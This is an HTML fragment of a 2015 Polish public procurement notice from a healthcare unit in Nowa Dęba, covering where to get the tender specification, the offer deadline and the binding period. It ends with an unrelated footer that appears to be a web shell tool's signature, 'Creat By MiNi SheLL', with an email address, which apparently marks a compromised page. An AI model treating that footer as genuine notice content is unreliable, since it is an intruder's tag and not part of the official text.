<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie, 39-460 Nowa Dęba,ul. M.C.Skłodowskiej 1A;pok.111;za zalicz.poczt.przesył.wniosek z adresem i nr NIP.Cena SIWZ 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie, 39-460 Nowa Dęba,ul. M.C.Skłodowskiej 1A -  Sekretariat pok.104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com